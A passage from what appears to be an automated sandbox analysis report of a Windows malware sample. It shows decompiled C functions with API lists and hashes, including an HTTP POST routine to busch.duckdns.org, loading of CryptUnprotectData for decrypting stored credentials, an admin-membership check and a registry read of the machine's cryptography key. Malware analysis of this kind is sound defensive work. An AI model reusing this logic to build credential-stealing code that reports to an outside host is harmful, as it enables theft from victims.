                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackModuleSend
                                                                                                                                                                                          • String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$busch.duckdns.org$wininet.dll
                                                                                                                                                                                          • API String ID: 3386017226-2673238456
                                                                                                                                                                                          • Opcode ID: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                          • Instruction ID: 8c20cc009bbb13acc87624f3a171753233ac08310759435a2e91fadf7e7a38d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54202a251d383afa9b440f1367a32a84581cecc305caedb9dc7d948c89e5b3e5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E1EBB1910218ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B7681DB78AA458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040955E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040955E() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41c7cc =  *0x41c7cc - 1;
				if( *0x41c7cc < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41c7c8 = _t3;
					return _t3;
				}
				return _t1;
			}






                                                                                                                                                                                          0x00409560
                                                                                                                                                                                          0x00409567
                                                                                                                                                                                          0x00409573
                                                                                                                                                                                          0x00409579
                                                                                                                                                                                          0x0040957e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040957e
                                                                                                                                                                                          0x00409583

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                          • API String ID: 2574300362-1827663648
                                                                                                                                                                                          • Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                          • Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407C58, Relevance: 4.6, APIs: 3, Instructions: 80COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 27%
                                                                                                                                                                                          			E00407C58() {
				long _v8;
				short _v10;
				char _v14;
				long _v20;
				long _v24;
				void* _v28;
				union _SID_NAME_USE _v32;
				char _v36;
				char _t21;
				short _t22;
				intOrPtr _t24;
				intOrPtr* _t26;
				intOrPtr* _t42;
				void* _t44;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t54 = _t56;
				_t57 = _t56 + 0xffffffe0;
				_v8 = 0;
				_t21 =  *0x41b0d0; // 0x0
				_v14 = _t21;
				_t22 =  *0x41b0d4; // 0x500
				_v10 = _t22;
				_t24 =  *0x41b0cc; // 0x12
				_t26 =  *0x41b5b0; // 0x41c720
				 *((intOrPtr*)( *_t26))( &_v14, 1, _t24, 0, 0, 0, 0, 0, 0, 0,  &_v28, _t53);
				if(_v28 == 0) {
					return _v8;
				} else {
					 *[fs:eax] = _t57;
					_v20 = 0;
					_v24 = 0;
					LookupAccountSidA(0, _v28, 0,  &_v20, 0,  &_v24,  &_v32); // executed
					_t42 =  *0x41b56c; // 0x41c72c
					_t44 =  *((intOrPtr*)( *_t42))(0, _v28,  &_v36,  *[fs:eax], 0x407d16, _t54); // executed
					if(_t44 != 0) {
						_v8 = _v36;
					} else {
						_v8 = 0;
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00407D1D);
					return FreeSid(_v28);
				}
			}






















                                                                                                                                                                                          0x00407c59
                                                                                                                                                                                          0x00407c5b
                                                                                                                                                                                          0x00407c60
                                                                                                                                                                                          0x00407c63
                                                                                                                                                                                          0x00407c69
                                                                                                                                                                                          0x00407c6c
                                                                                                                                                                                          0x00407c73
                                                                                                                                                                                          0x00407c89
                                                                                                                                                                                          0x00407c95
                                                                                                                                                                                          0x00407c9c
                                                                                                                                                                                          0x00407ca2
                                                                                                                                                                                          0x00407d23
                                                                                                                                                                                          0x00407ca4
                                                                                                                                                                                          0x00407caf
                                                                                                                                                                                          0x00407cb4
                                                                                                                                                                                          0x00407cb9
                                                                                                                                                                                          0x00407cd9
                                                                                                                                                                                          0x00407ce5
                                                                                                                                                                                          0x00407cec
                                                                                                                                                                                          0x00407cf0
                                                                                                                                                                                          0x00407cfc
                                                                                                                                                                                          0x00407cf2
                                                                                                                                                                                          0x00407cf4
                                                                                                                                                                                          0x00407cf4
                                                                                                                                                                                          0x00407d01
                                                                                                                                                                                          0x00407d04
                                                                                                                                                                                          0x00407d07
                                                                                                                                                                                          0x00407d15
                                                                                                                                                                                          0x00407d15

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AccountCheckFreeLookupMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1602037265-0
                                                                                                                                                                                          • Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                          • Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407B78, Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckFreeMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3914140973-0
                                                                                                                                                                                          • Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                          • Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407B77, Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
                                                                                                                                                                                          • FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CheckFreeMembershipToken
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3914140973-0
                                                                                                                                                                                          • Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                          • Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407500, Relevance: 3.1, APIs: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E00407500(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4, char _a8) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				intOrPtr* _t43;
				intOrPtr* _t52;
				void* _t56;
				intOrPtr _t63;
				void* _t67;

				_v12 = __ecx;
				_v8 = __edx;
				_t56 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				_push(_t67);
				_push(0x4075e3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				if(_a8 != 1) {
					RegOpenKeyExW(_t56, E00403D3C(_v8), 0, 0x20019,  &_v24); // executed
				} else {
					_t52 =  *0x41b574; // 0x41c71c
					 *((intOrPtr*)( *_t52))(_t56, E00403D3C(_v8), 0, 0x20119,  &_v24);
				}
				RegQueryValueExW(_v24, E00403D3C(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D10(_a4, 0x100,  &_v536);
				_t43 =  *0x41b58c; // 0x41c718
				 *((intOrPtr*)( *_t43))(); // executed
				_t63 = _t56;
				 *[fs:eax] = _t63;
				_push(E004075EA);
				return E00403B98( &_v12, 2);
			}














                                                                                                                                                                                          0x0040750a
                                                                                                                                                                                          0x0040750d
                                                                                                                                                                                          0x00407510
                                                                                                                                                                                          0x00407515
                                                                                                                                                                                          0x0040751d
                                                                                                                                                                                          0x00407524
                                                                                                                                                                                          0x00407525
                                                                                                                                                                                          0x0040752a
                                                                                                                                                                                          0x0040752d
                                                                                                                                                                                          0x00407530
                                                                                                                                                                                          0x00407537
                                                                                                                                                                                          0x00407544
                                                                                                                                                                                          0x00407582
                                                                                                                                                                                          0x00407546
                                                                                                                                                                                          0x0040755b
                                                                                                                                                                                          0x00407562
                                                                                                                                                                                          0x00407562
                                                                                                                                                                                          0x004075a9
                                                                                                                                                                                          0x004075b9
                                                                                                                                                                                          0x004075bf
                                                                                                                                                                                          0x004075c6
                                                                                                                                                                                          0x004075ca
                                                                                                                                                                                          0x004075cd
                                                                                                                                                                                          0x004075d0
                                                                                                                                                                                          0x004075e2

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocOpenQueryStringValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4139485348-0
                                                                                                                                                                                          • Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                          • Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004033F4, Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033F4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L3:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t32);
						 *0x41b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
							 *0x0041C634 = 0;
						}
						E004031DC();
						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
							_t14 =  *0x0041C638;
							if( *0x0041C638 != 0) {
								E00404890(_t14);
								_t35 =  *((intOrPtr*)(0x41c638));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E004031B4();
						if( *((char*)(0x41c650)) == 1) {
							 *0x0041C64C();
						}
						if( *((char*)(0x41c650)) != 0) {
							E00403338();
						}
						if( *0x41c628 == 0) {
							if( *0x41c018 != 0) {
								 *0x41c018();
							}
							ExitProcess( *0x41b000); // executed
						}
						memcpy(0x41c628,  *0x41c628, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x41b000 = 0x41b000;
					}
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L3;
				}
			}







                                                                                                                                                                                          0x0040340b
                                                                                                                                                                                          0x00403423
                                                                                                                                                                                          0x0040342a
                                                                                                                                                                                          0x0040342c
                                                                                                                                                                                          0x00403431
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040343d
                                                                                                                                                                                          0x00403441
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344d
                                                                                                                                                                                          0x00403456
                                                                                                                                                                                          0x0040345d
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x00403464
                                                                                                                                                                                          0x00403469
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346f
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x0040347e
                                                                                                                                                                                          0x00403487
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403490
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x0040349a
                                                                                                                                                                                          0x004034a3
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034c1
                                                                                                                                                                                          0x004034c1
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403418
                                                                                                                                                                                          0x0040341c
                                                                                                                                                                                          0x0040341e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403412

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                          • Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004033EC, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033EC() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L5:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t36);
						 *0x41b004 = 0;
					}
					L7:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t17 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E00404890(_t17);
							_t39 =  *((intOrPtr*)(0x41c638));
							_t7 = _t39 + 0x10; // 0x0
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x41b000 = 0x41b000;
					goto L7;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L5;
				}
			}








                                                                                                                                                                                          0x004033ee
                                                                                                                                                                                          0x0040340b
                                                                                                                                                                                          0x00403423
                                                                                                                                                                                          0x0040342a
                                                                                                                                                                                          0x0040342c
                                                                                                                                                                                          0x00403431
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x0040343d
                                                                                                                                                                                          0x00403441
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344d
                                                                                                                                                                                          0x00403456
                                                                                                                                                                                          0x0040345d
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x00403464
                                                                                                                                                                                          0x00403469
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346f
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x0040347e
                                                                                                                                                                                          0x00403487
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403490
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x0040349a
                                                                                                                                                                                          0x004034a3
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403418
                                                                                                                                                                                          0x0040341c
                                                                                                                                                                                          0x0040341e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403412

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
                                                                                                                                                                                          • Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                          • Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004033F0, Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004033F0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L4:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t35);
						 *0x41b004 = 0;
					}
					L6:
					if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
						 *0x0041C634 = 0;
					}
					E004031DC();
					if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
						_t16 =  *0x0041C638;
						if( *0x0041C638 != 0) {
							E00404890(_t16);
							_t38 =  *((intOrPtr*)(0x41c638));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E004031B4();
					if( *((char*)(0x41c650)) == 1) {
						 *0x0041C64C();
					}
					if( *((char*)(0x41c650)) != 0) {
						E00403338();
					}
					if( *0x41c628 == 0) {
						if( *0x41c018 != 0) {
							 *0x41c018();
						}
						ExitProcess( *0x41b000); // executed
					}
					memcpy(0x41c628,  *0x41c628, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x41b000 = 0x41b000;
					goto L6;
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
					} while ( *0x41c030 != 0);
					goto L4;
				}
			}







                                                                                                                                                                                          0x0040340b
                                                                                                                                                                                          0x00403423
                                                                                                                                                                                          0x0040342a
                                                                                                                                                                                          0x0040342c
                                                                                                                                                                                          0x00403431
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x00403438
                                                                                                                                                                                          0x0040343d
                                                                                                                                                                                          0x00403441
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344a
                                                                                                                                                                                          0x0040344d
                                                                                                                                                                                          0x00403456
                                                                                                                                                                                          0x0040345d
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x00403464
                                                                                                                                                                                          0x00403469
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346c
                                                                                                                                                                                          0x0040346f
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403479
                                                                                                                                                                                          0x00403472
                                                                                                                                                                                          0x00403462
                                                                                                                                                                                          0x0040347e
                                                                                                                                                                                          0x00403487
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403489
                                                                                                                                                                                          0x00403490
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x00403492
                                                                                                                                                                                          0x0040349a
                                                                                                                                                                                          0x004034a3
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034a5
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034ae
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034bf
                                                                                                                                                                                          0x004034c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403412
                                                                                                                                                                                          0x00403418
                                                                                                                                                                                          0x0040341c
                                                                                                                                                                                          0x0040341e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00403412

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitFreeLibraryProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1404682716-0
